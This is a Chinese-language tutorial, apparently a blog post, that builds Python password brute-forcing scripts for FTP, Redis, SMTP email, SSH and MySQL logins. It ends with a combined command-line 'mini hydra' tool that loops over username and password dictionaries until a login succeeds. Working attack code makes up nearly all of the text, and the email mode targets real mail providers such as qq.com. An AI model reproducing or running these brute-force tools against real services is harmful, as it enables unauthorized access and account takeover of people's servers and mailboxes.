目录
[案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议](#案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议)
[案例二: Python-数据库爆破-redis 库操作redis 协议](#案例二: Python-数据库爆破-redis 库操作redis 协议)
[案例三:Python-邮件爆破-smtplib 库操作 smtp 协议](#案例三:Python-邮件爆破-smtplib 库操作 smtp 协议)
[案例四:Python-登录爆破-paramiko库操作ssh协议](#案例四:Python-登录爆破-paramiko库操作ssh协议)
[案例五: Python-数据库爆破-pymysql 库操作 mysql 协议](#案例五: Python-数据库爆破-pymysql 库操作 mysql 协议)
[案例六: python-爆破整合-小型hydra](#案例六: python-爆破整合-小型hydra)
案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议
开一个ftp
利用ftp登录成功与登录失败时回显不同这一点
使用ftplib库进行测试
python
from ftplib import FTP
# FTP server address
ftp_server = '192.168.172.132'
# FTP server port (21 is the protocol default)
ftp_port = 21
# Login username
ftp_user = 'root'
# Login password
ftp_pass = '123.comm'
# Connect first, then authenticate.  A rejected credential makes login()
# raise, which is the observable difference the surrounding text relies on.
ftp = FTP()
ftp.connect(host=ftp_server, port=ftp_port)
ftp.login(user=ftp_user, passwd=ftp_pass)
成功
失败
在此基础之上加上字典进行循环就能爆破出来密码
爆破ftp账号密码的程序
python
from ftplib import FTP
def ftp_check(ip: str, port: int, username: str, password: str) -> None:
    """Attempt one FTP login and report the outcome on stdout.

    The control connection to ``ip``:``port`` is opened *before* the try,
    so a refused or timed-out connect propagates to the caller.  ``login``
    succeeding prints ``user|pass-->success`` and calls ``exit()`` —
    SystemExit is not an ``Exception``, so it ends the whole process.  Any
    other exception from ``login`` prints ``user|pass-->failed``.

    NOTE(review): the session is never closed with ``quit()``/``close()``;
    each call leaves its control connection open until the process exits.
    """
    session = FTP()
    session.connect(ip, port)
    try:
        session.login(username, password)
    except Exception:
        print(username + "|" + password + "-->failed")
    else:
        print(username + "|" + password + "-->success")
        exit()
if __name__ == '__main__':
    # Target host and port are read interactively with no validation; both
    # word lists come from fixed Windows-style paths under .\conf.
    ip = input("please input ip:")
    port = int(input("please input port:"))
    with open('.\\conf\\dic_username_ftp.txt', 'r') as names_file:
        raw_names = names_file.readlines()
    for raw_name in raw_names:
        name = raw_name.replace("\n", "")
        # The password list is re-read for every username, as the original
        # does, rather than loaded once.
        with open('.\\conf\\dic_password_ftp.txt', 'r') as pass_file:
            raw_passwords = pass_file.readlines()
        for raw_password in raw_passwords:
            ftp_check(ip, port, name, raw_password.replace("\n", ""))
运行结果
如果觉得输出太过繁琐,可以不输出失败的结果
案例二: Python-数据库爆破-redis 库操作redis 协议
开启redis:端口为6379
配置密码
尝试连接。redis没有账号的概念,直接用密码连接即可
连接成功之后可以设置变量,可以利用这一点来判断:如果没有连接成功,设置变量时会报错,
因为单纯建立连接即使不成功,它也不会报错
爆破程序
python
import redis
def redis_check(ip: str, password: str) -> None:
    """Attempt one Redis password authentication and report it on stdout.

    Redis is used here with a password only (no username).  Merely
    constructing the client does not prove the credential, so the probe is
    a write: ``SET test 123`` followed by ``DEL test`` on db 0, port 6379.
    If the SET succeeds the function prints ``<password>-->success``; if
    the DEL then also succeeds it calls ``exit()`` (SystemExit, which the
    ``except Exception`` does not catch, so the process ends).  Any failure
    prints ``<password>-->failed``.

    NOTE(review): the probe writes to the live keyspace — an existing key
    named ``test`` in db 0 would be overwritten and then deleted — and the
    connection is never explicitly closed.
    """
    try:
        client = redis.Redis(host=ip, port=6379, password=password, db=0)
        client.set("test", "123")
        print(password + "-->success")
        client.delete("test")
    except Exception:
        print(password + "-->failed")
    else:
        exit()
if __name__ == "__main__":
    # Host is typed interactively; candidates come from a fixed path under .\conf.
    ip = input("please input ip:")
    with open(".\\conf\\dic_password_redis.txt","r") as dict_file:
        candidates = dict_file.readlines()
    for candidate in candidates:
        redis_check(ip, candidate.replace("\n", ""))
运行结果
案例三:Python-邮件爆破-smtplib 库操作 smtp 协议
smtp调用库smtplib,smtp邮件可以利用授权码代替密码进行登录
需要根据后缀来进行判断是什么邮箱
代码,登录失败会报错
python
import smtplib
def email_check(email: str, password: str) -> None:
    """Attempt one SMTP AUTH login for ``email`` and print only on success.

    The mail host is derived from the address: the part after the first
    ``@`` prefixed with ``smtp.`` (``user@example.com`` -> ``smtp.example.com``).
    The split happens outside the try, so an address without ``@`` raises
    IndexError to the caller.  The session is plain ``smtplib.SMTP`` on port
    25 and no ``starttls()`` is issued, so the AUTH exchange travels over the
    unencrypted connection.  Success prints ``password is <pw> --> ok`` and
    calls ``exit()`` (SystemExit ends the process); every other error — DNS,
    connect, or a rejected credential — is swallowed silently.

    NOTE(review): the SMTP session is never closed with ``quit()``.
    """
    domain = email.split("@")[1]
    smtp_server = 'smtp.' + domain
    smtp_port = 25
    try:
        session = smtplib.SMTP()
        session.connect(smtp_server, smtp_port)
        session.login(email, password)
    except Exception:
        return
    print("password is " + password + ' --> ok')
    exit()
if __name__ == "__main__":
    # Address is typed interactively (prompt text kept verbatim);
    # candidates come from a fixed path under .\conf.
    email = input("please input your eamil:")
    with open(".\\conf\\dic_password_email.txt","r") as dict_file:
        candidates = dict_file.readlines()
    for candidate in candidates:
        email_check(email, candidate.replace("\n", ""))
运行结果
案例四:Python-登录爆破-paramiko库操作ssh协议
ssh连接调用paramiko库
python
import paramiko
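# Build the SSH client.
client = paramiko.SSHClient()
# AutoAddPolicy accepts any unknown host key and records it in the local
# known_hosts file, i.e. the server's identity is not verified on first contact.
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Connect to the remote host.  The second positional argument is the port
# (an int, default 22); the original line was missing the comma after it,
# which was a syntax error.
client.connect('远程主机IP', 22, username='用户名', password='密码')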
连接成功不会报错
失败报错
代码,端口为连接的第二个参数,默认为22
python
import paramiko,time
def ssh_check(ip: str, username: str, password: str) -> None:
    """Attempt one SSH password login and print the pair on success.

    Prints ``user | pass`` before every attempt.  The client uses
    ``AutoAddPolicy``, so an unknown host key is accepted without
    verification, and connects on paramiko's default port 22.  Success
    prints ``user | pass--> success`` and calls ``exit()`` (SystemExit ends
    the process); every other exception is swallowed, after which the
    function sleeps one second and returns.

    NOTE(review): the client is never closed.
    """
    print(username + " | " + password)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip, username=username, password=password)
    except Exception:
        pass
    else:
        print(username + " | " + password + "--> success")
        exit()
    time.sleep(1)
if __name__ == '__main__':
    # Host is typed interactively; both word lists come from fixed paths
    # under .\conf.  The password list is re-read for each username.
    ip = input("please input ip:")
    with open('.\\conf\\dic_username_ssh.txt', 'r') as names_file:
        raw_names = names_file.readlines()
    for raw_name in raw_names:
        name = raw_name.replace("\n", "")
        with open('.\\conf\\dic_password_ssh.txt', 'r') as pass_file:
            raw_passwords = pass_file.readlines()
        for raw_password in raw_passwords:
            ssh_check(ip, name, raw_password.replace("\n", ""))
运行结果
案例五: Python-数据库爆破-pymysql 库操作 mysql 协议
创建一个允许远程登录的用户 jie,密码为 123.com
CREATE USER 'jie'@'%' IDENTIFIED BY '123.com';
GRANT ALL PRIVILEGES ON *.* TO 'jie'@'%';
FLUSH PRIVILEGES;
能够成功连接
建立mysql连接
python
import mysql.connector
# Install the driver with: pip install mysql-connector-python
# Connection parameters for the test database.
conn_params = {
    "host": "192.168.172.132",  # MySQL server address
    "port": 3306,
    "user": "jie",  # username
    # NOTE(review): the CREATE USER statement above used '123.com';
    # one of the two values is probably a typo.
    "password": "123.comm",  # password
    "database": "mysql",  # database name
}
# Open the connection; a wrong host or credential raises here.
db = mysql.connector.connect(**conn_params)
安装相关库
错误连接会报错
在此基础之上写爆破mysql
python
import mysql.connector
def mysql_check(ip: str, port: int, username: str, password: str) -> None:
    """Attempt one MySQL login against the ``mysql`` schema; print on success.

    A successful ``connect`` prints ``user | pass--> success`` and calls
    ``exit()`` (SystemExit ends the process).  Every exception — unreachable
    host or rejected credential alike — is swallowed, so a failed pair
    produces no output at all.

    NOTE(review): the connection handle is never closed.
    """
    try:
        handle = mysql.connector.connect(
            host=ip,
            port=port,
            user=username,
            password=password,
            database="mysql",
        )
    except Exception:
        return
    print(username + " | " + password + "--> success")
    exit()
if __name__ == '__main__':
    # Host and port are typed interactively.  Note the word lists are the
    # *ftp* dictionaries under .\conf, not mysql-specific ones.
    ip = input("please input ip:")
    port = int(input("please input port:"))
    with open('.\\conf\\dic_username_ftp.txt', 'r') as names_file:
        raw_names = names_file.readlines()
    for raw_name in raw_names:
        name = raw_name.replace("\n", "")
        # Password list re-read for every username, as the original does.
        with open('.\\conf\\dic_password_ftp.txt', 'r') as pass_file:
            raw_passwords = pass_file.readlines()
        for raw_password in raw_passwords:
            mysql_check(ip, port, name, raw_password.replace("\n", ""))
运行结果
案例六: python-爆破整合-小型hydra
如果在命令行以 python xx.py 123456 这种在脚本名后面带参数的方式运行,需要引入 sys 库,通过 sys.argv[1] 获取参数
可以把变量设置在文件后面,如下图所示
代码,大部分功能已经实现;只是使用自定义字典时,如果参数不足5个,必须用数字占位,否则程序不能自动判断参数个数,会报错
python
from ftplib import FTP
import paramiko,time
import mysql.connector
import smtplib
import redis
import sys
def ftp_check(ip: str, port: int, username: str, password: str) -> None:
    """Attempt one FTP login; print and exit on success, stay silent otherwise.

    The control connection is opened before the try, so a refused or
    timed-out connect propagates to the caller.  A successful ``login``
    prints ``user|pass-->success`` and calls ``exit()`` (SystemExit, not
    caught by ``except Exception``, so the process ends).  Any other
    exception from ``login`` is swallowed without output.

    NOTE(review): the session is never closed with ``quit()``/``close()``.
    """
    session = FTP()
    session.connect(ip, port)
    try:
        session.login(username, password)
    except Exception:
        return
    print(username + "|" + password + "-->success")
    exit()
def ssh_check(ip: str, username: str, password: str) -> None:
    """Attempt one SSH password login and print the pair on success.

    Prints ``user | pass`` before every attempt.  ``AutoAddPolicy`` accepts
    unknown host keys without verification; the port is paramiko's default
    (22).  Success prints ``user | pass--> success`` and calls ``exit()``
    (SystemExit ends the process).  Any other exception is swallowed, then
    the function sleeps one second and returns.

    NOTE(review): the client is never closed.
    """
    print(username + " | " + password)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip, username=username, password=password)
    except Exception:
        pass
    else:
        print(username + " | " + password + "--> success")
        exit()
    time.sleep(1)
def mysql_check(ip: str, port: int, username: str, password: str) -> None:
    """Attempt one MySQL login against the ``mysql`` schema; print on success.

    A successful ``connect`` prints ``user | pass--> success`` and calls
    ``exit()`` (SystemExit ends the process).  Every exception is swallowed,
    so a rejected pair produces no output.

    NOTE(review): the connection handle is never closed.
    """
    try:
        handle = mysql.connector.connect(
            host=ip,
            port=port,
            user=username,
            password=password,
            database="mysql",
        )
    except Exception:
        return
    print(username + " | " + password + "--> success")
    exit()
def email_check(email: str, password: str) -> None:
    """Attempt one SMTP AUTH login for ``email`` and print only on success.

    The mail host is the part after the first ``@`` prefixed with ``smtp.``;
    the split is outside the try, so an address without ``@`` raises
    IndexError to the caller.  Plain ``smtplib.SMTP`` on port 25 with no
    ``starttls()``, so the AUTH exchange is unencrypted.  Success prints
    ``password is <pw> --> ok`` and calls ``exit()`` (SystemExit ends the
    process); DNS, connect and authentication errors are all swallowed.

    NOTE(review): the SMTP session is never closed with ``quit()``.
    """
    domain = email.split("@")[1]
    smtp_server = 'smtp.' + domain
    smtp_port = 25
    try:
        session = smtplib.SMTP()
        session.connect(smtp_server, smtp_port)
        session.login(email, password)
    except Exception:
        return
    print("password is " + password + ' --> ok')
    exit()
def redis_check(ip: str, password: str) -> None:
    """Attempt one Redis password authentication; print and exit on success.

    The probe is a write (``SET test 123`` then ``DEL test`` on db 0, port
    6379) because creating the client alone does not prove the credential.
    A successful SET prints ``<password>-->success``; if the DEL also
    succeeds, ``exit()`` is called (SystemExit ends the process).  Any
    failure is swallowed without output.

    NOTE(review): the probe touches the live keyspace — an existing key
    named ``test`` would be overwritten and deleted — and the connection is
    never explicitly closed.
    """
    try:
        client = redis.Redis(host=ip, port=6379, password=password, db=0)
        client.set("test", "123")
        print(password + "-->success")
        client.delete("test")
    except Exception:
        return
    exit()
if __name__ == "__main__":
    # Command-line driver.  argv layout: [script, mode, host, port-or-placeholder,
    # user-dict, pass-dict].  Fewer than three entries prints the usage text;
    # the second `if` below is its exact complement, so exactly one of the
    # two branches runs.
    if len(sys.argv) <= 2:
        print('eg:固定字典使用说明:')
        print('python hydra.py ftp ip port')
        print('python hydra.py ssh ip')
        print('python hydra.py redis ip')
        print('python hydra.py mysql ip port')
        print('python hydra.py email xxxx@qq.com')
        print('eg:自定义字典使用说明:')
        print('python hydra.py ftp ip port user.txt pass.txt')
        print('python hydra.py ssh ip port user.txt pass.txt')
        print('python hydra.py redis ip 1 2 pass.txt')
        print('python hydra.py mysql ip port user.txt pass.txt')
        print('python hydra.py email xx@qq.com 2 3 pass.txt')
    if len(sys.argv) > 2:
        # argv[1] selects the protocol; argv[2] is the host, or for "email"
        # the full address (copied into `email` further down).
        xy=sys.argv[1]
        ip=sys.argv[2]
        if len(sys.argv) > 3:
            # argv[3] is always parsed as an int, even where the usage text
            # above uses it only as a numeric placeholder (redis / email forms).
            port = sys.argv[3]
            port = int(port)
        if len(sys.argv) >= 5:
            # NOTE(review): argv[5] is read whenever there are at least five
            # entries, so exactly five entries raise IndexError here, outside
            # any try.
            usertxt=sys.argv[4]
            passtxt=sys.argv[5]
        try:
            # `usertxt` is bound only when custom dictionaries were supplied.
            # Without them this line raises NameError, which the `except
            # Exception` below catches — that is how the built-in dictionary
            # path gets selected.  A check function calling exit() raises
            # SystemExit, which is not an Exception and passes through both
            # handlers to end the process.
            if usertxt is not None:
                if xy=="ftp" :
                    with open(usertxt, 'r') as file:
                        names = file.readlines()
                    for name in names:
                        name = name.replace("\n","")
                        print(name)
                        with open(passtxt, 'r') as file:
                            passwords = file.readlines()
                        for password in passwords:
                            password = password.replace("\n","")
                            ftp_check(ip,port,name,password)
                elif xy=="ssh":
                    with open(usertxt, 'r') as file:
                        names = file.readlines()
                    for name in names:
                        name = name.replace("\n","")
                        with open(passtxt, 'r') as file:
                            passwords = file.readlines()
                        for password in passwords:
                            password = password.replace("\n","")
                            ssh_check(ip,name,password)
                elif xy=="redis":
                    with open(passtxt,"r") as file:
                        passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        redis_check(ip,password)
                elif xy=="mysql":
                    with open(usertxt, 'r') as file:
                        names = file.readlines()
                    for name in names:
                        name = name.replace("\n","")
                        print(name)
                        with open(passtxt, 'r') as file:
                            passwords = file.readlines()
                        for password in passwords:
                            password = password.replace("\n","")
                            mysql_check(ip,port,name,password)
                elif xy=="email":
                    email = ip
                    print(email)
                    with open(passtxt,"r") as file:
                        passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        email_check(email,password)
        except Exception as e:
            # Built-in dictionaries under .\conf.  NOTE(review): every
            # Exception from the custom-dictionary run lands here too (for
            # example a mistyped dictionary path or an error raised inside a
            # check function), so the built-in lists are then tried without
            # any message explaining why.
            try:
                if xy=="ftp" :
                    with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
                        names = file.readlines()
                    for name in names:
                        name = name.replace("\n","")
                        with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
                            passwords = file.readlines()
                        for password in passwords:
                            password = password.replace("\n","")
                            ftp_check(ip,port,name,password)
                elif xy=="ssh":
                    with open('.\\conf\\dic_username_ssh.txt', 'r') as file:
                        names = file.readlines()
                    for name in names:
                        name = name.replace("\n","")
                        with open('.\\conf\\dic_password_ssh.txt', 'r') as file:
                            passwords = file.readlines()
                        for password in passwords:
                            password = password.replace("\n","")
                            ssh_check(ip,name,password)
                elif xy=="redis":
                    with open(".\\conf\\dic_password_redis.txt","r") as file:
                        passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        redis_check(ip,password)
                elif xy=="mysql":
                    # NOTE(review): this built-in mysql run reuses the *ftp*
                    # dictionaries and hard-codes port 3306, unlike the custom
                    # run above which passes `port`.
                    with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
                        names = file.readlines()
                    for name in names:
                        name = name.replace("\n","")
                        with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
                            passwords = file.readlines()
                        for password in passwords:
                            password = password.replace("\n","")
                            mysql_check(ip,3306,name,password)
                elif xy=="email":
                    email = ip
                    print(email)
                    with open(".\\conf\\dic_password_email.txt","r") as file:
                        passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n","")
                        email_check(email,password)
            except Exception as e:
                # Errors from the fallback run (including a missing .\conf
                # file) are discarded silently.
                pass
运行结果
不输入参数进行提示
无自定义字典ftp爆破
无自定义字典ssh爆破
无自定义字典redis爆破
无自定义字典mysql爆破
无自定义字典邮箱爆破
自定义字典ftp爆破
自定义字典ssh爆破,这里我默认使用22端口,第三个参数用数字1占位,没有实际作用,也可以改成用它来指定端口
自定义字典爆破redis
自定义字典mysql爆破
自定义字典邮箱爆破